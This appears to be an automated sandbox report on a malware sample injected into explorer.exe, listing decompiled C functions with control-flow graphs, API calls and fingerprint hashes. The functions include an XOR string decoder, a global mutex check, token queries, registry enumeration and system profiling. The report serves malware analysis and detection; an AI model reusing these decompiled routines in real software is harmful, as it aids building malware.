                                                                                                                                                                                              control_flow_graph 131 2f889ef-2f88a10 132 2f88a38-2f88a48 131->132 133 2f88a12-2f88a2a 131->133 136 2f88a58-2f88a5c 132->136 137 2f88a4a-2f88a4f 132->137 134 2f88a2c-2f88a30 133->134 135 2f88a34-2f88a36 133->135 134->133 138 2f88a32 134->138 135->132 140 2f88a6a-2f88a76 lstrlenA 136->140 141 2f88a5e-2f88a68 136->141 137->137 139 2f88a51-2f88a56 137->139 138->132 139->136 139->141 142 2f88a78-2f88a7c call 2f88bde 140->142 143 2f88aba 140->143 141->140 141->141 146 2f88a81-2f88a89 142->146 145 2f88abf 143->145 147 2f88ac1-2f88ac5 145->147 148 2f88a8b-2f88a90 146->148 149 2f88a92-2f88a9a 146->149 148->147 150 2f88a9c-2f88ab3 149->150 150->150 151 2f88ab5-2f88ab8 150->151 151->145
                                                                                                                                                                                              C-Code - Quality: 93%
                                                                                                                                                                                              			E02F889EF(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a12) {
                                                                                                                                                                                              				intOrPtr _v8;
                                                                                                                                                                                              				intOrPtr _v12;
                                                                                                                                                                                              				signed int _v16;
                                                                                                                                                                                              				intOrPtr _v28;
                                                                                                                                                                                              				char _v32;
                                                                                                                                                                                              				void* _t39;
                                                                                                                                                                                              				intOrPtr _t42;
                                                                                                                                                                                              				intOrPtr _t44;
                                                                                                                                                                                              				void* _t54;
                                                                                                                                                                                              				void* _t57;
                                                                                                                                                                                              				intOrPtr _t58;
                                                                                                                                                                                              				intOrPtr _t60;
                                                                                                                                                                                              				intOrPtr _t61;
                                                                                                                                                                                              				void* _t63;
                                                                                                                                                                                              				void* _t73;
                                                                                                                                                                                              				signed int _t74;
                                                                                                                                                                                              				signed int _t76;
                                                                                                                                                                                              				signed int _t77;
                                                                                                                                                                                              				signed int _t79;
                                                                                                                                                                                              				void* _t80;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t77 = _a12;
                                                                                                                                                                                              				_v8 = __ecx;
                                                                                                                                                                                              				_t57 = 0;
                                                                                                                                                                                              				_v12 = __edx;
                                                                                                                                                                                              				_t54 = 0;
                                                                                                                                                                                              				_v16 = 0x5a;
                                                                                                                                                                                              				if(_t77 < __edx) {
                                                                                                                                                                                              					while(1) {
                                                                                                                                                                                              						_t74 = 0x5a;
                                                                                                                                                                                              						_t76 = _a12;
                                                                                                                                                                                              						if( *((intOrPtr*)(_t77 % _t74 + _a4)) ==  *((intOrPtr*)(_t77 + _v8))) {
                                                                                                                                                                                              							break;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						_t77 = _t77 + 1;
                                                                                                                                                                                              						if(_t77 < _v12) {
                                                                                                                                                                                              							continue;
                                                                                                                                                                                              						} else {
                                                                                                                                                                                              						}
                                                                                                                                                                                              						goto L5;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					_t54 = _t77 - _t76;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				L5:
                                                                                                                                                                                              				_t39 = _t57;
                                                                                                                                                                                              				asm("movsd");
                                                                                                                                                                                              				asm("movsd");
                                                                                                                                                                                              				asm("movsb");
                                                                                                                                                                                              				if(_v28 == _t39) {
                                                                                                                                                                                              					L8:
                                                                                                                                                                                              					_t63 = _t39;
                                                                                                                                                                                              					if(_t63 != 0) {
                                                                                                                                                                                              						goto L9;
                                                                                                                                                                                              					}
                                                                                                                                                                                              				} else {
                                                                                                                                                                                              					do {
                                                                                                                                                                                              						_t39 = _t39 + 1;
                                                                                                                                                                                              					} while ( *((intOrPtr*)(_t80 + _t39 - 0x18)) != _t57);
                                                                                                                                                                                              					_t63 = 0xe;
                                                                                                                                                                                              					if(_t39 > _t63) {
                                                                                                                                                                                              						do {
                                                                                                                                                                                              							L9:
                                                                                                                                                                                              							_t19 = _t57 + 0x30; // 0x30
                                                                                                                                                                                              							 *((char*)(_t80 + _t57 - 0x1c)) = _t19;
                                                                                                                                                                                              							_t57 = _t57 + 1;
                                                                                                                                                                                              						} while (_t57 < _t63);
                                                                                                                                                                                              					} else {
                                                                                                                                                                                              						goto L8;
                                                                                                                                                                                              					}
                                                                                                                                                                                              				}
                                                                                                                                                                                              				lstrlenA( &_v32);
                                                                                                                                                                                              				if(_t54 == 0) {
                                                                                                                                                                                              					_t58 = 0x2f9f896;
                                                                                                                                                                                              					goto L17;
                                                                                                                                                                                              				} else {
                                                                                                                                                                                              					_t23 = _t54 + 1; // 0x1
                                                                                                                                                                                              					_t44 = E02F88BDE(_t23); // executed
                                                                                                                                                                                              					_t60 = _t44;
                                                                                                                                                                                              					_v12 = _t60;
                                                                                                                                                                                              					if(_t60 != 0) {
                                                                                                                                                                                              						_t79 = _a12;
                                                                                                                                                                                              						_t61 = _v8;
                                                                                                                                                                                              						_t73 = _t60 - _t79;
                                                                                                                                                                                              						do {
                                                                                                                                                                                              							 *(_t73 + _t79) =  *(_t79 % _v16 + _a4) ^  *(_t79 + _t61);
                                                                                                                                                                                              							_t79 = _t79 + 1;
                                                                                                                                                                                              							_t54 = _t54 - 1;
                                                                                                                                                                                              						} while (_t54 != 0);
                                                                                                                                                                                              						_t58 = _v12;
                                                                                                                                                                                              						L17:
                                                                                                                                                                                              						_t42 = _t58;
                                                                                                                                                                                              					} else {
                                                                                                                                                                                              						_t42 = 0x2f9f896;
                                                                                                                                                                                              					}
                                                                                                                                                                                              				}
                                                                                                                                                                                              				return _t42;
                                                                                                                                                                                              			}
























                                                                                                                                                                                              APIs
                                                                                                                                                                                              • lstrlenA.KERNEL32(?,00000138,?,02F9CA50), ref: 02F88A6E
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000020.00000002.676164607.0000000002F80000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F80000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_32_2_2f80000_explorer.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: lstrlen
                                                                                                                                                                                              • String ID: Research$Z
                                                                                                                                                                                              • API String ID: 1659193697-3866491824
                                                                                                                                                                                              • Opcode ID: 65c397d81b8c2f7bc64dde3761e1d522fb3cb7c842d20b3da7b8f7dbd677d3fc
                                                                                                                                                                                              • Instruction ID: 4b301d323cab039b400196383f57d4f6d6606ed819e2f2d64336a3ed283adb5a
                                                                                                                                                                                              • Opcode Fuzzy Hash: 65c397d81b8c2f7bc64dde3761e1d522fb3cb7c842d20b3da7b8f7dbd677d3fc
                                                                                                                                                                                              • Instruction Fuzzy Hash: E331F935F0424DAFCF14DFAC84401AEFBA6BF893D0B584469EA51D7381D630ED418790
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 152 2f8c7f5-2f8c815 GetTokenInformation 153 2f8c85b 152->153 154 2f8c817-2f8c820 GetLastError 152->154 155 2f8c85d-2f8c861 153->155 154->153 156 2f8c822-2f8c832 call 2f88bde 154->156 159 2f8c838-2f8c84b GetTokenInformation 156->159 160 2f8c834-2f8c836 156->160 159->153 161 2f8c84d-2f8c859 call 2f88bf4 159->161 160->155 161->160
                                                                                                                                                                                              C-Code - Quality: 86%
                                                                                                                                                                                              			E02F8C7F5(union _TOKEN_INFORMATION_CLASS __edx, DWORD* _a4) {
                                                                                                                                                                                              				long _v8;
                                                                                                                                                                                              				void* _v12;
                                                                                                                                                                                              				void* _t12;
                                                                                                                                                                                              				void* _t20;
                                                                                                                                                                                              				void* _t22;
                                                                                                                                                                                              				union _TOKEN_INFORMATION_CLASS _t28;
                                                                                                                                                                                              				void* _t31;
                                                                                                                                                                                              
                                                                                                                                                                                              				_push(_t22);
                                                                                                                                                                                              				_push(_t22);
                                                                                                                                                                                              				_t31 = 0;
                                                                                                                                                                                              				_t28 = __edx;
                                                                                                                                                                                              				_t20 = _t22;
                                                                                                                                                                                              				if(GetTokenInformation(_t20, __edx, 0, 0,  &_v8) != 0 || GetLastError() != 0x7a) {
                                                                                                                                                                                              					L6:
                                                                                                                                                                                              					_t12 = _t31;
                                                                                                                                                                                              				} else {
                                                                                                                                                                                              					_t31 = E02F88BDE(_v8);
                                                                                                                                                                                              					_v12 = _t31;
                                                                                                                                                                                              					if(_t31 != 0) {
                                                                                                                                                                                              						if(GetTokenInformation(_t20, _t28, _t31, _v8, _a4) != 0) {
                                                                                                                                                                                              							goto L6;
                                                                                                                                                                                              						} else {
                                                                                                                                                                                              							E02F88BF4( &_v12, _t16);
                                                                                                                                                                                              							goto L3;
                                                                                                                                                                                              						}
                                                                                                                                                                                              					} else {
                                                                                                                                                                                              						L3:
                                                                                                                                                                                              						_t12 = 0;
                                                                                                                                                                                              					}
                                                                                                                                                                                              				}
                                                                                                                                                                                              				return _t12;
                                                                                                                                                                                              			}











                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,00000000,00001644,02F80000,00000000,00000000,?,02F8C876,00000000,00000000,?,02F8C89F), ref: 02F8C810
                                                                                                                                                                                              • GetLastError.KERNEL32(?,02F8C876,00000000,00000000,?,02F8C89F,00001644,?,02F8DFCE), ref: 02F8C817
                                                                                                                                                                                                • Part of subcall function 02F88BDE: RtlAllocateHeap.NTDLL(00000008,?,?,02F8959D,00000100,?,02F86507), ref: 02F88BEC
                                                                                                                                                                                              • GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,?,?,02F8C876,00000000,00000000,?,02F8C89F,00001644,?,02F8DFCE), ref: 02F8C846
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000020.00000002.676164607.0000000002F80000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F80000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_32_2_2f80000_explorer.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: InformationToken$AllocateErrorHeapLast
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2499131667-0
                                                                                                                                                                                              • Opcode ID: b7e4aa6500a6e54e6a7a1fc39fc2e2e8052edd6ec802389a1d38d84bf50b27f0
                                                                                                                                                                                              • Instruction ID: bd84f31f89ba2e28f0589e594c64090a76bcdd9adf59abd19e179de5de8b77a3
                                                                                                                                                                                              • Opcode Fuzzy Hash: b7e4aa6500a6e54e6a7a1fc39fc2e2e8052edd6ec802389a1d38d84bf50b27f0
                                                                                                                                                                                              • Instruction Fuzzy Hash: 5E016772A40118BF9B246BA5DC49DABBFACEE456E0711056AF605E2110D770D900CBF0
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 164 2f85ed4-2f8b0ec 166 2f8b0ee-2f8b0f1 164->166 167 2f8b0f3-2f8b108 CreateMutexA 164->167 168 2f8b146-2f8b148 166->168 169 2f8b10a-2f8b113 GetLastError 167->169 170 2f8b115-2f8b120 GetLastError 167->170 171 2f8b145 169->171 172 2f8b13d-2f8b143 170->172 173 2f8b122-2f8b12e call 2f8b149 170->173 171->168 172->171 173->172 176 2f8b130-2f8b13b 173->176 176->171
                                                                                                                                                                                              C-Code - Quality: 91%
                                                                                                                                                                                              			E02F85ED4(signed int __eax, CHAR* __ecx, void* __edx) {
                                                                                                                                                                                              				intOrPtr* _v0;
                                                                                                                                                                                              				signed int _t9;
                                                                                                                                                                                              				intOrPtr _t11;
                                                                                                                                                                                              				void* _t20;
                                                                                                                                                                                              				void* _t23;
                                                                                                                                                                                              
                                                                                                                                                                                              				_pop(_t25);
                                                                                                                                                                                              				_t20 = __edx;
                                                                                                                                                                                              				if(__ecx != 0) {
                                                                                                                                                                                              					_t23 = CreateMutexA(0, 1, __ecx);
                                                                                                                                                                                              					if(_t23 != 0) {
                                                                                                                                                                                              						if(GetLastError() != 0xb7 || E02F8B149(_t23, _t20) != 0xffffffff) {
                                                                                                                                                                                              							_t9 = 1;
                                                                                                                                                                                              							 *_v0 = _t23;
                                                                                                                                                                                              						} else {
                                                                                                                                                                                              							_t11 =  *0x2f9f818; // 0x508f6c8
                                                                                                                                                                                              							 *((intOrPtr*)(_t11 + 0x30))(_t23);
                                                                                                                                                                                              							_t9 = 0;
                                                                                                                                                                                              						}
                                                                                                                                                                                              					} else {
                                                                                                                                                                                              						_t9 = GetLastError() | 0xffffffff;
                                                                                                                                                                                              					}
                                                                                                                                                                                              				} else {
                                                                                                                                                                                              					_t9 = __eax | 0xffffffff;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				return _t9;
                                                                                                                                                                                              			}









                                                                                                                                                                                              APIs
                                                                                                                                                                                              • CreateMutexA.KERNELBASE(00000000,00000001,00000000,00000000,00000000,?,02F85F36,?,Global,02F9CA40,?,00000000,?,00000001), ref: 02F8B0FE
                                                                                                                                                                                              • GetLastError.KERNEL32(?,02F85F36,?,Global,02F9CA40,?,00000000,?,00000001), ref: 02F8B10A
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000020.00000002.676164607.0000000002F80000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F80000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_32_2_2f80000_explorer.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CreateErrorLastMutex
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1925916568-0
                                                                                                                                                                                              • Opcode ID: 0c87bff90b18ad127b8e84d195415fa27de459d6fdaa759516e40139c05a34b3
                                                                                                                                                                                              • Instruction ID: ed9cacf380389b7b96f722aa9eb35a1dc98dbe5a12610f33967e3db9c7e7b3d3
                                                                                                                                                                                              • Opcode Fuzzy Hash: 0c87bff90b18ad127b8e84d195415fa27de459d6fdaa759516e40139c05a34b3
                                                                                                                                                                                              • Instruction Fuzzy Hash: 2AF0F432B409049BE6202779D806B79F699EF456FEF100769F739CE1D0DB6094028391
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              C-Code - Quality: 72%
                                                                                                                                                                                              			E02F85EDD(void* __ecx, void* __edx, void* __eflags) {
                                                                                                                                                                                              				void* _v8;
                                                                                                                                                                                              				char _v12;
                                                                                                                                                                                              				char _v52;
                                                                                                                                                                                              				intOrPtr _t16;
                                                                                                                                                                                              				void* _t19;
                                                                                                                                                                                              				intOrPtr _t27;
                                                                                                                                                                                              				void* _t42;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t42 = __edx;
                                                                                                                                                                                              				_v8 = 0;
                                                                                                                                                                                              				E02F8B557( &_v52, __ecx, __eflags);
                                                                                                                                                                                              				_t16 =  *0x2f9f81c; // 0x2fb0000
                                                                                                                                                                                              				if( *((intOrPtr*)(_t16 + 0x644)) > 0) {
                                                                                                                                                                                              					L1:
                                                                                                                                                                                              					_t27 =  *0x2f9f818; // 0x508f6c8
                                                                                                                                                                                              					 *((intOrPtr*)(_t27 + 0xc0))(0x32);
                                                                                                                                                                                              					goto L1;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				_push(0);
                                                                                                                                                                                              				_push( &_v52);
                                                                                                                                                                                              				_push("\\");
                                                                                                                                                                                              				_v12 = E02F89A07("Global");
                                                                                                                                                                                              				_push( &_v8);
                                                                                                                                                                                              				_t19 = E02F85ED4(_t18, _t18, _t42); // executed
                                                                                                                                                                                              				__eflags = _t19 - 1;
                                                                                                                                                                                              				if(_t19 == 1) {
                                                                                                                                                                                              					FindCloseChangeNotification(_v8);
                                                                                                                                                                                              					_v8 = 0;
                                                                                                                                                                                              					_push( &_v8);
                                                                                                                                                                                              					E02F85ED4( &_v8,  &_v52, _t42); // executed
                                                                                                                                                                                              				}
                                                                                                                                                                                              				E02F88BF4( &_v12, 0xffffffff);
                                                                                                                                                                                              				return _v8;
                                                                                                                                                                                              			}











                                                                                                                                                                                              APIs
                                                                                                                                                                                              • FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,00000001), ref: 02F85F46
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000020.00000002.676164607.0000000002F80000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F80000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_32_2_2f80000_explorer.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ChangeCloseFindNotification
                                                                                                                                                                                              • String ID: Global
                                                                                                                                                                                              • API String ID: 2591292051-4020866741
                                                                                                                                                                                              • Opcode ID: c16f0e239285a56cb3c049092d4e56b4427166f050b8979cfee4c805c61ac452
                                                                                                                                                                                              • Instruction ID: e9100cb0e46728906d7a37040300befbc1d45da902ecff680ba267d2a46c9dd0
                                                                                                                                                                                              • Opcode Fuzzy Hash: c16f0e239285a56cb3c049092d4e56b4427166f050b8979cfee4c805c61ac452
                                                                                                                                                                                              • Instruction Fuzzy Hash: 7F117C76E04108EBDB14EB99EC45DEDB7F9EB84390B61416AE606E7290DA309A01CB50
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 194 2f866c7-2f8670c memset call 2f88bde 197 2f86712-2f86724 call 2f88bde 194->197 198 2f86876-2f8687c 194->198 197->198 201 2f8672a-2f86747 RegOpenKeyExW 197->201 202 2f8674d-2f86780 201->202 203 2f86846-2f8684a 201->203 209 2f86792-2f86797 202->209 210 2f86782-2f8678d 202->210 204 2f8684c-2f86851 203->204 205 2f86857-2f86873 call 2f88bf4 * 2 203->205 204->205 205->198 209->203 211 2f8679d 209->211 210->203 215 2f867a0-2f867ef call 2f88d6d * 2 211->215 221 2f86839-2f86840 215->221 222 2f867f1-2f86801 215->222 221->203 221->215 224 2f86803-2f86817 222->224 225 2f86836 222->225 224->225 227 2f86819-2f86826 call 2f8a456 224->227 225->221 230 2f86828-2f8682a 227->230 231 2f8682f-2f86831 call 2f8bfdb 227->231 230->231 231->225
                                                                                                                                                                                              C-Code - Quality: 80%
                                                                                                                                                                                              			E02F866C7(void* __edx, void* __fp0, void* _a4, short* _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                                                                                              				void* _v8;
                                                                                                                                                                                              				int _v12;
                                                                                                                                                                                              				char _v16;
                                                                                                                                                                                              				char _v20;
                                                                                                                                                                                              				char _v24;
                                                                                                                                                                                              				char _v28;
                                                                                                                                                                                              				char _v32;
                                                                                                                                                                                              				char _v36;
                                                                                                                                                                                              				char _v40;
                                                                                                                                                                                              				char _v44;
                                                                                                                                                                                              				char _v48;
                                                                                                                                                                                              				char _v56;
                                                                                                                                                                                              				void _v576;
                                                                                                                                                                                              				intOrPtr _t63;
                                                                                                                                                                                              				intOrPtr _t72;
                                                                                                                                                                                              				intOrPtr _t80;
                                                                                                                                                                                              				intOrPtr _t81;
                                                                                                                                                                                              				intOrPtr _t82;
                                                                                                                                                                                              				signed int _t85;
                                                                                                                                                                                              				intOrPtr _t87;
                                                                                                                                                                                              				int _t89;
                                                                                                                                                                                              				intOrPtr _t90;
                                                                                                                                                                                              				intOrPtr _t92;
                                                                                                                                                                                              				void* _t96;
                                                                                                                                                                                              				char _t97;
                                                                                                                                                                                              				short* _t98;
                                                                                                                                                                                              				void* _t99;
                                                                                                                                                                                              				void* _t100;
                                                                                                                                                                                              				void* _t108;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t108 = __fp0;
                                                                                                                                                                                              				_t96 = __edx;
                                                                                                                                                                                              				_t89 = 0;
                                                                                                                                                                                              				_v8 = 0;
                                                                                                                                                                                              				memset( &_v576, 0, 0x208);
                                                                                                                                                                                              				_v28 = 0x104;
                                                                                                                                                                                              				_v20 = 0x3fff;
                                                                                                                                                                                              				_v16 = 0;
                                                                                                                                                                                              				_t98 = E02F88BDE(0x3fff);
                                                                                                                                                                                              				_t100 = _t99 + 0x10;
                                                                                                                                                                                              				_v32 = _t98;
                                                                                                                                                                                              				if(_t98 == 0) {
                                                                                                                                                                                              					L18:
                                                                                                                                                                                              					return 0;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				_t97 = E02F88BDE(0x800);
                                                                                                                                                                                              				_v36 = _t97;
                                                                                                                                                                                              				if(_t97 == 0) {
                                                                                                                                                                                              					goto L18;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				if(RegOpenKeyExW(_a4, _a8, 0, 0x2001f,  &_v8) != 0) {
                                                                                                                                                                                              					L15:
                                                                                                                                                                                              					if(_v8 != 0) {
                                                                                                                                                                                              						_t63 =  *0x2f9f820; // 0x508f8b8
                                                                                                                                                                                              						 *((intOrPtr*)(_t63 + 0x1c))(_v8);
                                                                                                                                                                                              					}
                                                                                                                                                                                              					E02F88BF4( &_v32, 0x3fff);
                                                                                                                                                                                              					E02F88BF4( &_v36, 0x800);
                                                                                                                                                                                              					goto L18;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				_push( &_v56);
                                                                                                                                                                                              				_push( &_v40);
                                                                                                                                                                                              				_push( &_v44);
                                                                                                                                                                                              				_push( &_v48);
                                                                                                                                                                                              				_push( &_v24);
                                                                                                                                                                                              				_push(0);
                                                                                                                                                                                              				_push(0);
                                                                                                                                                                                              				_push(0);
                                                                                                                                                                                              				_push(0);
                                                                                                                                                                                              				_push( &_v28);
                                                                                                                                                                                              				_push( &_v576);
                                                                                                                                                                                              				_t72 =  *0x2f9f820; // 0x508f8b8
                                                                                                                                                                                              				_push(_v8);
                                                                                                                                                                                              				if( *((intOrPtr*)(_t72 + 0xb0))() == 0) {
                                                                                                                                                                                              					__eflags = _v24;
                                                                                                                                                                                              					if(_v24 == 0) {
                                                                                                                                                                                              						goto L15;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					_v12 = 0;
                                                                                                                                                                                              					do {
                                                                                                                                                                                              						E02F88D6D(_t97, 0, 0x800);
                                                                                                                                                                                              						E02F88D6D(_t98, 0, 0x3fff);
                                                                                                                                                                                              						_t100 = _t100 + 0x18;
                                                                                                                                                                                              						_v20 = 0x3fff;
                                                                                                                                                                                              						_v16 = 0x800;
                                                                                                                                                                                              						 *_t98 = 0;
                                                                                                                                                                                              						_t80 =  *0x2f9f820; // 0x508f8b8
                                                                                                                                                                                              						_t81 =  *((intOrPtr*)(_t80 + 0xc8))(_v8, _t89, _t98,  &_v20, 0, 0, _t97,  &_v16);
                                                                                                                                                                                              						__eflags = _t81;
                                                                                                                                                                                              						if(_t81 == 0) {
                                                                                                                                                                                              							_t82 =  *0x2f9f824; // 0x508f990
                                                                                                                                                                                              							_t90 =  *((intOrPtr*)(_t82 + 4))(_t97, _a12);
                                                                                                                                                                                              							__eflags = _t90;
                                                                                                                                                                                              							if(_t90 != 0) {
                                                                                                                                                                                              								_t92 =  *0x2f9f820; // 0x508f8b8
                                                                                                                                                                                              								 *((intOrPtr*)(_t92 + 0xa8))(_v8, _t98);
                                                                                                                                                                                              								__eflags = _a16;
                                                                                                                                                                                              								if(_a16 != 0) {
                                                                                                                                                                                              									_t85 = E02F8A456(_t90);
                                                                                                                                                                                              									__eflags =  *((short*)(_t90 + _t85 * 2 - 2)) - 0x22;
                                                                                                                                                                                              									if(__eflags == 0) {
                                                                                                                                                                                              										__eflags = 0;
                                                                                                                                                                                              										 *((short*)(_t90 + _t85 * 2 - 2)) = 0;
                                                                                                                                                                                              									}
                                                                                                                                                                                              									E02F8BFDB(_t90, _t96, __eflags, _t108);
                                                                                                                                                                                              								}
                                                                                                                                                                                              							}
                                                                                                                                                                                              							_t89 = _v12;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						_t89 = _t89 + 1;
                                                                                                                                                                                              						_v12 = _t89;
                                                                                                                                                                                              						__eflags = _t89 - _v24;
                                                                                                                                                                                              					} while (_t89 < _v24);
                                                                                                                                                                                              					goto L15;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				_t87 =  *0x2f9f820; // 0x508f8b8
                                                                                                                                                                                              				 *((intOrPtr*)(_t87 + 0x1c))(_v8);
                                                                                                                                                                                              				goto L15;
                                                                                                                                                                                              			}

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • memset.MSVCRT ref: 02F866E5
                                                                                                                                                                                                • Part of subcall function 02F88BDE: RtlAllocateHeap.NTDLL(00000008,?,?,02F8959D,00000100,?,02F86507), ref: 02F88BEC
                                                                                                                                                                                              • RegOpenKeyExW.KERNELBASE(?,?,00000000,0002001F,?,?,?,00000001), ref: 02F8673F
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000020.00000002.676164607.0000000002F80000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F80000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_32_2_2f80000_explorer.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AllocateHeapOpenmemset
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3010731174-0
                                                                                                                                                                                              • Opcode ID: dd83b9f03be13260042776a8fe2aec1e691af2c27c2b1ce52739da70ed28c2a3
                                                                                                                                                                                              • Instruction ID: e0f32956b6453bb824c4c1a60ba05aebca174796f02a459b414c29cacb7b5b3a
                                                                                                                                                                                              • Opcode Fuzzy Hash: dd83b9f03be13260042776a8fe2aec1e691af2c27c2b1ce52739da70ed28c2a3
                                                                                                                                                                                              • Instruction Fuzzy Hash: 4D512771E0020DAFDB51EFA4CD85FEEBBBDAF08384F144469E605E6141EB359A448FA0
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                              			E02F8DD81(void* __ecx) {
                                                                                                                                                                                              				intOrPtr _t12;
                                                                                                                                                                                              				intOrPtr _t14;
                                                                                                                                                                                              				intOrPtr _t15;
                                                                                                                                                                                              				intOrPtr _t16;
                                                                                                                                                                                              				intOrPtr _t21;
                                                                                                                                                                                              				intOrPtr _t22;
                                                                                                                                                                                              				void* _t28;
                                                                                                                                                                                              				void* _t32;
                                                                                                                                                                                              				struct _OSVERSIONINFOA* _t33;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t12 =  *0x2f9f818; // 0x508f6c8
                                                                                                                                                                                              				_t33 =  *0x2f9f81c; // 0x2fb0000
                                                                                                                                                                                              				_t14 = E02F8C879( *((intOrPtr*)(_t12 + 0x12c))(_t28, _t32, __ecx)); // executed
                                                                                                                                                                                              				 *((intOrPtr*)(_t33 + 0x110)) = _t14;
                                                                                                                                                                                              				_t3 = _t33 + 0x1644; // 0x2fb1644
                                                                                                                                                                                              				_t29 = _t3;
                                                                                                                                                                                              				_t15 =  *0x2f9f818; // 0x508f6c8
                                                                                                                                                                                              				_t16 =  *((intOrPtr*)(_t15 + 0x128))(0, _t3, 0x105);
                                                                                                                                                                                              				_t37 = _t16;
                                                                                                                                                                                              				if(_t16 != 0) {
                                                                                                                                                                                              					_t16 = E02F895F3(_t29, _t37);
                                                                                                                                                                                              				}
                                                                                                                                                                                              				_t5 = _t33 + 0x228; // 0x2fb0228
                                                                                                                                                                                              				 *((intOrPtr*)(_t33 + 0x1854)) = _t16;
                                                                                                                                                                                              				 *((intOrPtr*)(_t33 + 0x434)) = E02F895F3(_t5, _t37);
                                                                                                                                                                                              				E02F88D6D(_t33, 0, 0x9c);
                                                                                                                                                                                              				_t33->dwOSVersionInfoSize = 0x9c;
                                                                                                                                                                                              				GetVersionExA(_t33);
                                                                                                                                                                                              				 *((intOrPtr*)(_t33 + 0x1640)) = GetCurrentProcessId();
                                                                                                                                                                                              				_t21 = E02F8F368(_t5);
                                                                                                                                                                                              				_t9 = _t33 + 0x220; // 0x2fb0220
                                                                                                                                                                                              				 *((intOrPtr*)(_t33 + 0x21c)) = _t21;
                                                                                                                                                                                              				_t22 = E02F8F3A3(_t9); // executed
                                                                                                                                                                                              				 *((intOrPtr*)(_t33 + 0x218)) = _t22;
                                                                                                                                                                                              				return _t22;
                                                                                                                                                                                              			}













                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetVersionExA.KERNEL32(02FB0000,02FB0000,?,02F83B9C), ref: 02F8DDF4
                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32(?,02F83B9C), ref: 02F8DDFA
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000020.00000002.676164607.0000000002F80000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F80000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_32_2_2f80000_explorer.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CurrentProcessVersion
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2809935031-0
